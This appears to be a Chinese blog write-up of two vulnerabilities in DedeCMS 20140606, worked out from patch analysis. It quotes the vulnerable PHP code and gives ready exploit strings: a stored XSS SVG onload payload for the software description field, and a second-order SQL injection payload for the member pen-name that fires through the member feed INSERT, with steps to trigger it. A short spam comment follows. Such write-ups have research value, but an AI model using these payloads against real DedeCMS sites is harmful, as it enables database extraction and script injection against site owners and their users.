dedecms20140606 二次注入+存储型xss

红色目录有exp,注入比较鸡肋 目录 dede/soft_edit.php, 存储型XSS漏洞        2 include /memberlogin.class.php 会员笔名二次注入        4 KibodWapon http://blog.163.com/cmdbat@126 从201406011补丁分析得来。 dede/soft_edit.php, 存储型XSS漏洞 [php] <?php /** * 软件编辑 * * @version        $Id: soft_edit.php 1 16:09 2010年7月20日Z tianya $ * @package        DedeCMS.Administrator * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc. * @license        http://help.dedecms.com/usersguide/license.html * @link           http://www.dedecms.com */ require_once(dirname(__FILE__)."/config.php"); CheckPurview('a_Edit,a_AccEdit,a_MyEdit'); require_once(DEDEINC."/customfields.func.php"); require_once(DEDEADMIN."/inc/inc_archives_functions.php"); if(empty($dopost)) $dopost = ''; if($dopost!='save') { require_once(DEDEADMIN."/inc/inc_catalog_options.php"); require_once(DEDEINC."/dedetag.class.php"); ClearMyAddon(); $aid = preg_replace("#[^0-9]#", '', $aid); $channelid="3"; //读取归档信息 $arcQuery = "SELECT #@__channeltype.typename as channelname, #@__arcrank.membername as rankname, #@__archives.* FROM #@__archives LEFT JOIN #@__channeltype ON #@__channeltype.id=#@__archives.channel LEFT JOIN #@__arcrank ON #@__arcrank.rank=#@__archives.arcrank WHERE #@__archives.id='$aid'"; $dsql->SetQuery($arcQuery); $arcRow = $dsql->GetOne($arcQuery); if(!is_array($arcRow)) { ShowMsg("读取档案基本信息出错!","-1"); exit(); } $query = "SELECT * FROM `#@__channeltype` WHERE id='".$arcRow['channel']."'"; $cInfos = $dsql->GetOne($query); if(!is_array($cInfos)) { ShowMsg("读取频道配置信息出错!","javascript:;"); exit(); } $addtable = $cInfos['addtable']; $addQuery = "SELECT * FROM `$addtable` WHERE aid='$aid'"; $addRow = $dsql->GetOne($addQuery); $newRowStart = 1; $nForm = ''; $daccess = $addRow['daccess']; $needmoney = $addRow['needmoney']; if($addRow['softlinks'] != '') { $dtp = new DedeTagParse(); $dtp->LoadSource($addRow['softlinks']); if(is_array($dtp->CTags)) { foreach($dtp->CTags as $ctag) { if($ctag->GetName()=='link') { $islocal = $ctag->GetAtt('islocal'); if($islocal != 1) $needmsg = "<input type='checkbox' name='del{$newRowStart}' value='1' />删除"; else $needmsg = '<input name="sel1" type="button" id="sel1" value="选取" onClick="SelectSoft(\'form1.softurl'.$newRowStart.'\')" />'; $nForm .= "<div style='line-height:36px'>软件地址{$newRowStart}:<input type='text' name='softurl{$newRowStart}' style='width:280px' value='".trim($ctag->GetInnerText())."' /> 服务器名称:<input type='text' name='servermsg{$newRowStart}' value='".$ctag->GetAtt("text")."' style='width:150px' /> <input type='hidden' name='islocal{$newRowStart}' value='{$islocal}' /> $needmsg </div>\r\n"; $newRowStart++; } } } $dtp->Clear(); } $channelid = $arcRow['channel']; $tags = GetTags($aid); $arcRow= $arcRow;$addRow= $addRow; include DedeInclude("templets/soft_edit.htm"); exit(); } [/php] 发布软件软件介绍处过滤不严 软件详情,点击源码编辑 [php]<svg / <g onload="javascript:alert(1)"></g></svg>[/php]1 include /memberlogin.class.php 会员笔名二次注入 注册用户笔名处注入 利用条件开启会员注册 [php]function FormatUsername($username) { $username = str_replace("`","‘",$username); $username = str_replace("'","‘",$username); $username = str_replace("\"","“",$username); $username = str_replace(",",",",$username); $username = str_replace("(","(",$username); $username = str_replace(")",")",$username); return addslashes($username); } $this->M_UserName = $this->fields['uname']; [/php] 登陆函数 [php]function __construct($kptime = -1, $cache=FALSE) { global $dsql; if($kptime==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kptime; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE; if(empty($this->M_ID)) { $this->ResetUser(); }else{ $this->M_ID = intval($this->M_ID); if ($cache) { $this->fields = GetCache($this->memberCache, $this->M_ID); if( empty($this->fields) ) { $this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' "); } else { $formcache = TRUE; } } else { $this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' "); } if(is_array($this->fields)){ #api{{ if(defined('UC_API') && @include_once DEDEROOT.'/uc_client/client.php') { if($data = uc_get_user($this->fields['userid'])) { if(uc_check_avatar($data[0]) && !strstr($this->fields['face'],UC_API)) { $this->fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&size=middle'; $dsql->ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this->fields['face']."' WHERE `mid`='{$this->M_ID}'"); } } } #/aip}} //间隔一小时更新一次用户登录时间 if(time() - $this->M_LoginTime > 3600) { $dsql->ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this->fields['mid']."';"); PutCookie("DedeLoginTime",time(),$this->M_KeepTime); } $this->M_LoginID = $this->fields['userid']; $this->M_MbType = $this->fields['mtype']; $this->M_Money = $this->fields['money']; $this->M_UserName = $this->fields['uname']; $this->M_Scores = $this->fields['scores']; $this->M_Face = $this->fields['face']; $this->M_Rank = $this->fields['rank']; $this->M_Spacesta = $this->fields['spacesta']; $sql = "Select titles From #@__scores where integral<={$this->fields['scores']} order by integral desc"; $scrow = $dsql->GetOne($sql); $this->fields['honor'] = $scrow['titles']; $this->M_Honor = $this->fields['honor']; if($this->fields['matt']==10) $this->isAdmin = TRUE; $this->M_UpTime = $this->fields['uptime']; $this->M_ExpTime = $this->fields['exptime']; $this->M_JoinTime = MyDate('Y-m-d',$this->fields['jointime']); if($this->M_Rank>10 && $this->M_UpTime>0){ $this->M_HasDay = $this->Judgemember(); } if( !$formcache ) { SetCache($this->memberCache, $this->M_ID, $this->fields, 1800); } }else{ $this->ResetUser(); } } } [/php] 登陆后 [php]   /** *  记录会员操作日志 * * @access    public * @param     string  $type 记录类型 * @param     string  $title 记录标题 * @param     string  $note记录描述 * @param     string  $aid涉及到的内容的id * @return    string */ 造成注入 会员动态表, function RecordFeeds($type, $title, $note, $aid) { global $dsql,$cfg_mb_feedcheck; //确定是否需要记录 if (in_array($type,array('add','addsoft','feedback','addfriends','stow'))){ $ntime = time(); $title = htmlspecialchars(cn_substrR($title,255)); if(in_array($type,array('add','addsoft','feedback','stow'))) { $rcdtype = array('add'=>' 成功发布了', 'addsoft'=>' 成功发布了软件', 'feedback'=>' 评论了文章','stow'=>' 收藏了'); //内容发布处理 $arcrul = " <a href='/plus/view.php?aid=".$aid."'>".$title."</a>"; $title = htmlspecialchars($rcdtype[$type].$arcrul, ENT_QUOTES); } else if ($type == 'addfriends') { //添加好友处理 $arcrul = " <a href='/member/index.php?uid=".$aid."'>".$aid."</a>"; $title = htmlspecialchars(' 与'. $arcrul."成为好友", ENT_QUOTES); } $note = Html2Text($note); $aid = (isset($aid) && is_numeric($aid) ? $aid : 0); $ischeck = ($cfg_mb_feedcheck == 'Y')? 0 : 1; $query = "INSERT INTO `#@__member_feed` (`mid`, `userid`, `uname`, `type`, `aid`, `dtime`,`title`, `note`, `ischeck`) Values('$this->M_ID', '$this->M_LoginID', '$this->M_UserName'/*二次注入到这里*/, '$type', '$aid', '$ntime', '$title', '$note', '$ischeck'); "; $rs = $dsql->ExecuteNoneQuery($query); return $rs; } else { return FALSE; } } [/php] 用户笔名长度: [php]if(strlen($userid) > 20 || strlen($uname) > 36) { ShowMsg('你的用户名或用户笔名过长,不允许注册!', '-1'); exit(); } [/php] 注册用户笔名 exp: ',1,3,1,1,VERsion(),1),(1,1,'1 发表文章,任意 进入会员中心,点击我的动态 2

1 条评论

  1. 笑话

    无意间发现的网站 很不错 挺喜欢的

发表评论